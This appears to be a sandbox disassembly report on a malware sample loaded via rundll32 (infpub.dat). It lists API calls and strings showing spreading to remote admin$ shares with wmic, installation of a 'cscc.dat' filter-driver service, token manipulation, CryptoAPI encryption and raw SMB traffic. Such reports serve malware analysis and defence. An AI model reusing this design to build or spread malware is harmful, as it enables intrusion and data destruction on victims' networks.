Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Non-executed Functions

Function 00479B63, Relevance: 73.8, APIs: 35, Strings: 7, Instructions: 296

APIs

wsprintfW.USER32 ref: 00479BA5

Part of subcall function 004788D3: PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 004788E3

wsprintfW.USER32 ref: 00479BF2
wsprintfW.USER32 ref: 00479C16
PathFindExtensionW.SHLWAPI(?), ref: 00479C22
wsprintfW.USER32 ref: 00479C41
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00479C59
PathFileExistsW.SHLWAPI(?), ref: 00479C69
GetLastError.KERNEL32 ref: 00479C73

Part of subcall function 004787E7: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004787FC
Part of subcall function 004787E7: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00478813
Part of subcall function 004787E7: CloseHandle.KERNEL32(00000000), ref: 00478824

GetLastError.KERNEL32(?), ref: 00479C9A
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 00479CDD
CloseHandle.KERNEL32(?), ref: 00479EE4

Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000008,?,761B423D,00000000), ref: 004768EB
Part of subcall function 004768B5: HeapAlloc.KERNEL32(00000000), ref: 004768F4
Part of subcall function 004768B5: memcpy.MSVCRT ref: 00476921
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000008,?,757DCF90), ref: 00476946
Part of subcall function 004768B5: HeapAlloc.KERNEL32(00000000), ref: 00476949
Part of subcall function 004768B5: memcpy.MSVCRT ref: 00476978
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 00476995
Part of subcall function 004768B5: HeapFree.KERNEL32(00000000), ref: 00476998
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0047699F
Part of subcall function 004768B5: HeapFree.KERNEL32(00000000), ref: 004769A2

GetCurrentThread.KERNEL32(00000002,00000001,?,?), ref: 00479D1B
OpenThreadToken.ADVAPI32(00000000), ref: 00479D22
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 00479D3C
memset.MSVCRT ref: 00479D62
GetSystemDirectoryW.KERNEL32 ref: 00479D8A
PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 00479DAA
PathFileExistsW.SHLWAPI(?), ref: 00479DB7
wsprintfW.USER32 ref: 00479DD8
CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 00479E24
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00479E2C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00479E3B
GetExitCodeProcess.KERNEL32(?,?), ref: 00479E4B
CloseHandle.KERNEL32(?), ref: 00479E59
CloseHandle.KERNEL32(?), ref: 00479E63
CloseHandle.KERNEL32(?), ref: 00479E6D
CloseHandle.KERNEL32(?), ref: 00479E77
CloseHandle.KERNEL32(?), ref: 00479E81
PathFileExistsW.SHLWAPI(?), ref: 00479E99
GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 00479EA6
GetLastError.KERNEL32 ref: 00479EB0
DeleteFileW.KERNEL32(?), ref: 00479EC5
CloseHandle.KERNEL32(?), ref: 00479ED7
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 00479EF9
SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,00479FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,00000000), ref: 00479F17

Strings

W, xrefs: 00479F01
wbem\wmic.exe, xrefs: 00479D9E
D, xrefs: 00479D7C
\\%s\admin$, xrefs: 00479B9F
cscc.dat, xrefs: 00479C31
%ws , xrefs: 00479DD2
\\%ws\admin$\%ws, xrefs: 00479BE5, 00479BF0, 00479C14, 00479C3F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004757E5, Relevance: 18.2, APIs: 12, Instructions: 160

APIs

LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 00475805
GetSystemDefaultLCID.KERNEL32 ref: 0047581D
GetTimeZoneInformation.KERNEL32(?), ref: 0047582D
memcpy.MSVCRT ref: 0047584B
NetWkstaGetInfo.NETAPI32(00480494,00000064,?), ref: 00475861
memcpy.MSVCRT ref: 004758C7
memcpy.MSVCRT ref: 004758EA
NetApiBufferFree.NETAPI32(?,?,?,?), ref: 004758F3

Part of subcall function 004756D8: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00475714
Part of subcall function 004756D8: LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 0047571F
Part of subcall function 004756D8: memcpy.MSVCRT ref: 00475736
Part of subcall function 004756D8: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00475750
Part of subcall function 004756D8: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0047576E

LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 00475924
memcpy.MSVCRT ref: 00475943

Part of subcall function 00475780: CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 0047579E
Part of subcall function 00475780: LocalAlloc.KERNEL32(00000040,?,00000000,?,00475988,00000000,?,?,?,?,?,?,?,?), ref: 004757AD
Part of subcall function 00475780: CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 004757C6
Part of subcall function 00475780: LocalFree.KERNEL32(00000000,?,00475988,00000000,?,?,?,?,?,?,?,?), ref: 004757D6

LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 0047598C
LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 004759A2

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047841D, Relevance: 16.6, APIs: 11, Instructions: 78

APIs

GetCurrentProcessId.KERNEL32(?,00478555,?,?), ref: 00478430
OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,00478555,?,?), ref: 0047844C
OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,00478555,?,?), ref: 00478464
DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,00478555,?,?), ref: 0047847D
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004784A3
CheckTokenMembership.ADVAPI32(?,?,?), ref: 004784BA
TerminateProcess.KERNEL32(00000000,00000000), ref: 004784CB
FreeSid.ADVAPI32(?), ref: 004784D4
CloseHandle.KERNEL32(?), ref: 004784DD
CloseHandle.KERNEL32(?), ref: 004784E2
CloseHandle.KERNEL32(00000000), ref: 004784E5

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477CC5, Relevance: 9.1, APIs: 6, Instructions: 55

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,004779E8), ref: 00477CE9
OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,004779E8), ref: 00477CF0
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00477D02
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00477D25
GetLastError.KERNEL32(?,00000000), ref: 00477D2D
SetLastError.KERNEL32(?,?,00000000,?,?,?,004779E8), ref: 00477D3F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047559B, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 004755BC
CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 004755CB
CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 004755DA
LocalAlloc.KERNEL32(00000040,?), ref: 004755EE
CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 00475601
LocalFree.KERNEL32(?), ref: 00475606

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004756D8, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00475714
LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 0047571F
memcpy.MSVCRT ref: 00475736
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00475750
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0047576E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476085, Relevance: 6.0, APIs: 4, Instructions: 49

APIs

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,004762E0,?,?,?,?), ref: 004760A6
CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,004762E0,?,?,?,?), ref: 004760BA
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,004762E0,?,?,?,?), ref: 004760D3
CryptDestroyHash.ADVAPI32(?,?,?,?,004762E0,?,?,?,?), ref: 004760DF

Part of subcall function 0047559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 004755BC
Part of subcall function 0047559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 004755CB
Part of subcall function 0047559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 004755DA
Part of subcall function 0047559B: LocalAlloc.KERNEL32(00000040,?), ref: 004755EE
Part of subcall function 0047559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 00475601
Part of subcall function 0047559B: LocalFree.KERNEL32(?), ref: 00475606

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475780, Relevance: 6.0, APIs: 4, Instructions: 47

APIs

CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 0047579E
LocalAlloc.KERNEL32(00000040,?,00000000,?,00475988,00000000,?,?,?,?,?,?,?,?), ref: 004757AD
CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 004757C6
LocalFree.KERNEL32(00000000,?,00475988,00000000,?,?,?,?,?,?,?,?), ref: 004757D6

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476246, Relevance: 4.5, APIs: 3, Instructions: 39

APIs

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,004762E9,?,?,?,?), ref: 00476260
CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,004762E9,?,?,?,?), ref: 00476273
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,004762E9,?,?,?,?), ref: 00476289

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004729A2, Relevance: 57.4, APIs: 38, Instructions: 367

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,757DFE8D,?,00474775), ref: 004729BF
HeapAlloc.KERNEL32(00000000,?,00474775), ref: 004729C8
GetProcessHeap.KERNEL32(00000008,00001124,?,00474775), ref: 004729DC
HeapAlloc.KERNEL32(00000000,?,00474775), ref: 004729DF
rand.MSVCRT ref: 004729F0
htons.WS2_32(00000050), ref: 00472A25
rand.MSVCRT ref: 00472A7E
rand.MSVCRT ref: 00472A96
send.WS2_32(00000000,00000000,00000054,00000000), ref: 00472ABB
recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 00472AD2
rand.MSVCRT ref: 00472AE7
htons.WS2_32(00001120), ref: 00472B06
GetProcessHeap.KERNEL32(00000008,00000160,?,00474775), ref: 00472B6A
HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472B71
htons.WS2_32(0000015C), ref: 00472B90
rand.MSVCRT ref: 00472BBE
GetProcessHeap.KERNEL32(00000008,00000048,?,00474775), ref: 00472BD2
HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472BD9
htons.WS2_32(00000044), ref: 00472BF8
GetProcessHeap.KERNEL32(00000008,00001638,?,00474775), ref: 00472C58
HeapAlloc.KERNEL32(00000000,?,00474775), ref: 00472C5F
memcpy.MSVCRT ref: 00472C79
memcpy.MSVCRT ref: 00472C90
htons.WS2_32(00000050), ref: 00472C9A
memcpy.MSVCRT ref: 00472D17
send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 00472D37
send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 00472D4F
recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 00472D86
GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,00474775), ref: 00472DB3
HeapFree.KERNEL32(00000000), ref: 00472DBA
GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DC6
HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DCD
GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DD9
HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DE0
GetProcessHeap.KERNEL32(00000008,00000000,?,00474775), ref: 00472DE9
HeapFree.KERNEL32(00000000,?,00474775), ref: 00472DF0
GetProcessHeap.KERNEL32(00000008,?,?,00474775), ref: 00472DFB
HeapFree.KERNEL32(00000000,?,00474775), ref: 00472E02

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00473D0D, Relevance: 39.3, APIs: 26, Instructions: 326

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,757DFE8D,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?), ref: 00473D2B
HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D34
GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 00473D46
HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D49
GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 00473D63
HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D66

Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 00473220
Part of subcall function 00473209: HeapAlloc.KERNEL32(00000000,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 00473227
Part of subcall function 00473209: htons.WS2_32(?), ref: 00473246
Part of subcall function 00473209: memcpy.MSVCRT ref: 00473276
Part of subcall function 00473209: send.WS2_32(?,00000000,?,00000000), ref: 00473287
Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047329A
Part of subcall function 00473209: HeapFree.KERNEL32(00000000), ref: 004732A1

Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,00474269,?,00000000,?,?,?), ref: 00473E5B
GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 00473E65
HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473E68
rand.MSVCRT ref: 00473EC3

Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 004732CB
Part of subcall function 004732AF: HeapAlloc.KERNEL32(00000000), ref: 004732D4
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,?,757DFE8D), ref: 004732EF
Part of subcall function 004732AF: HeapAlloc.KERNEL32(00000000), ref: 004732F2
Part of subcall function 004732AF: htons.WS2_32(?), ref: 0047330F
Part of subcall function 004732AF: memcpy.MSVCRT ref: 0047333D
Part of subcall function 004732AF: send.WS2_32(?,00000000,?,00000000), ref: 00473350
Part of subcall function 004732AF: recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473368
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047337B
Part of subcall function 004732AF: HeapFree.KERNEL32(00000000), ref: 00473382
Part of subcall function 004732AF: GetProcessHeap.KERNEL32(00000008,?), ref: 0047338D
Part of subcall function 004732AF: HeapFree.KERNEL32(00000000), ref: 00473394

memset.MSVCRT ref: 00473EFC
recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 00473F38
htons.WS2_32(?), ref: 00473F5C
Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 00473FF8
Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 00474063
GetProcessHeap.KERNEL32(00000008,?), ref: 0047406E
HeapAlloc.KERNEL32(00000000), ref: 00474075
memcpy.MSVCRT ref: 0047408F
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,00474269,?,00000000,?,?), ref: 004740A0
HeapFree.KERNEL32(00000000), ref: 004740A7
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,00474269,?,00000000,?,?), ref: 004740B6
HeapFree.KERNEL32(00000000), ref: 004740B9
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 004740C2
HeapFree.KERNEL32(00000000), ref: 004740C5
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 004740D0
HeapFree.KERNEL32(00000000), ref: 004740D3

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004713E8, Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 118

APIs

wsprintfW.USER32 ref: 00471408
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 00471427
RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 00471453
RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 0047147E
RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 00471495
RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 004714B3
RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 004714CB
RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 004714E9
RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 00471501
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00471523

Strings

FltMgr, xrefs: 004714BB
Start, xrefs: 00471444, 00471449, 00471477, 00471491
cscc, xrefs: 0047150E
SYSTEM\CurrentControlSet\services\%ws, xrefs: 004713FD
DependOnService, xrefs: 004714C3
cscc.dat, xrefs: 004714F1
ImagePath, xrefs: 004714F9
Group, xrefs: 004714AB
Filter, xrefs: 004714A1
ErrorControl, xrefs: 004714DA
cdfs, xrefs: 004713F2, 00471507

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047516B, Relevance: 31.7, APIs: 17, Strings: 4, Instructions: 172

APIs

Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 00471ED2
Part of subcall function 00471EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471EDB
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0047943A), ref: 00471F1F
Part of subcall function 00471EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00471F22
Part of subcall function 00471EB9: htons.WS2_32(?), ref: 00471F41
Part of subcall function 00471EB9: send.WS2_32(?,00000000,?,00000000), ref: 00471FF1
Part of subcall function 00471EB9: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472008
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 0047202B
Part of subcall function 00471EB9: HeapFree.KERNEL32(00000000), ref: 00472032
Part of subcall function 00471EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047203D
Part of subcall function 00471EB9: HeapFree.KERNEL32(00000000), ref: 00472044

Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0047943A), ref: 0047206D
Part of subcall function 00472054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 00472076
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0047943A), ref: 0047209C
Part of subcall function 00472054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A), ref: 0047209F
Part of subcall function 00472054: htons.WS2_32(?), ref: 004720BC
Part of subcall function 00472054: send.WS2_32(?,00000000,?,00000000), ref: 00472131
Part of subcall function 00472054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 00472148
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A), ref: 00472168
Part of subcall function 00472054: HeapFree.KERNEL32(00000000), ref: 0047216F
Part of subcall function 00472054: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0047943A), ref: 0047217A
Part of subcall function 00472054: HeapFree.KERNEL32(00000000), ref: 00472181

Part of subcall function 00474E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 00474E76
Part of subcall function 00474E60: HeapAlloc.KERNEL32(00000000), ref: 00474E79
Part of subcall function 00474E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00474F2A
Part of subcall function 00474E60: HeapFree.KERNEL32(00000000), ref: 00474F2D
Part of subcall function 00474E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 00474F32
Part of subcall function 00474E60: HeapFree.KERNEL32(00000000), ref: 00474F35

GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 004751D3
HeapAlloc.KERNEL32(00000000), ref: 004751DC

Part of subcall function 00474F43: GetProcessHeap.KERNEL32(00000008,00000068,757DFE8D,?,773E29EE,?,004751F9,?,?,?), ref: 00474F56
Part of subcall function 00474F43: HeapAlloc.KERNEL32(00000000,?,004751F9,?,?,?), ref: 00474F5D
Part of subcall function 00474F43: rand.MSVCRT ref: 00474F86
Part of subcall function 00474F43: GetProcessHeap.KERNEL32(00000008,?,004751F9,?,00000000,?,004751F9,004751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 00474FF7
Part of subcall function 00474F43: HeapFree.KERNEL32(00000000), ref: 00474FFE
Part of subcall function 00474F43: GetProcessHeap.KERNEL32(00000008,00000000,004751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,004751F9,?,?,?), ref: 00475007
Part of subcall function 00474F43: HeapFree.KERNEL32(00000000,?,004751F9), ref: 0047500E

GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 00475205
HeapAlloc.KERNEL32(00000000), ref: 00475208
rand.MSVCRT ref: 0047521B
rand.MSVCRT ref: 00475226
rand.MSVCRT ref: 0047522F
sprintf.MSVCRT ref: 00475246
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475252
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475255
sprintf.MSVCRT ref: 004752AB

Part of subcall function 00474B5D: GetProcessHeap.KERNEL32(00000008,00000000,757DFE8D,76F2D354,00000000,?,00000000,00000000,00000000), ref: 00474C14
Part of subcall function 00474B5D: HeapAlloc.KERNEL32(00000000), ref: 00474C1B
Part of subcall function 00474B5D: rand.MSVCRT ref: 00474CE6

HeapFree.KERNEL32(00000000), ref: 0047530B

Part of subcall function 0047501E: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,000000FF,00000008,?,00000000,00000000), ref: 0047508E
Part of subcall function 0047501E: HeapFree.KERNEL32(00000000,?,004752E8), ref: 00475095

Part of subcall function 004750A2: GetProcessHeap.KERNEL32(00000008,00000034,757DFE8D,00000000,?,?,?,004752FD,?,?,?,?,?,?,?,00000000), ref: 004750B3
Part of subcall function 004750A2: HeapAlloc.KERNEL32(00000000,?,?,?,004752FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004750BA
